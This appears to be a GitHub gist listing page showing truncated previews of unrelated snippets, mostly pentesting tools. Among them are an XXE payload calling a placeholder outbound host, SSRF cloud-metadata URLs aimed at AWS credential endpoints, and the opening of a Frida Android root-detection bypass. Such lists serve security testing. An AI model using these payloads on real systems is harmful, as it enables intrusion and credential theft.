Skip to content

Instantly share code, notes, and snippets.

@dmethvin
dmethvin / gist:1676346
Created January 25, 2012 13:51
Breakpoint on access to a property
function debugAccess(obj, prop, debugGet){
var origValue = obj[prop];
Object.defineProperty(obj, prop, {
get: function () {
if ( debugGet )
debugger;
return origValue;
},
@staaldraad
staaldraad / XXE_payloads
Last active June 15, 2024 16:32
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active May 25, 2024 21:22
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@CraigRodrigues
CraigRodrigues / caesar.c
Last active October 1, 2022 02:57
My solution to CS50 pset2 - "Hail, Caesar!"
#include <stdio.h>
#include <cs50.h>
#include <string.h>
#include <ctype.h>
/**
* Caesar.c
* A program that encrypts messages using Caesar’s cipher. Your program must
* accept a single command-line argument: a non-negative integer. Let’s call it
* k for the sake of discussion. If your program is executed without any
@hermanbanken
hermanbanken / Dockerfile
Last active June 9, 2024 22:18
Compiling NGINX module as dynamic module for use in docker
FROM nginx:alpine AS builder
# nginx:alpine contains NGINX_VERSION environment variable, like so:
# ENV NGINX_VERSION 1.15.0
# Our NCHAN version
ENV NCHAN_VERSION 1.1.15
# Download sources
RUN wget "http://nginx.org/download/nginx-${NGINX_VERSION}.tar.gz" -O nginx.tar.gz && \
@a7v8x
a7v8x / graphql_introspection_query.graphql
Last active November 5, 2023 12:36
GraphQL introspection query - for fetching the whole schema (from GraphiQL IDE) for https://atheros.ai/blog/graphql-introspection-and-introspection-queries
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
types {
...FullType
}
directives {
name
description
@pich4ya
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active June 14, 2024 01:38
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@0xatul
0xatul / foxyproxyBB.json
Created June 25, 2020 09:46
firefox foxy proxy settings for BB stuff
{
"84kr3q1592995213323": {
"type": 1,
"color": "#cc883a",
"title": "Burp",
"active": true,
"address": "127.0.0.1",
"port": 8080,
"proxyDNS": false,
"username": "",
@LuD1161
LuD1161 / shodan_api_query.py
Created July 4, 2020 12:54
Query Shodan API : Plain and Simple
# -*- coding: utf-8 -*-
import requests
import time
import os
import json
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',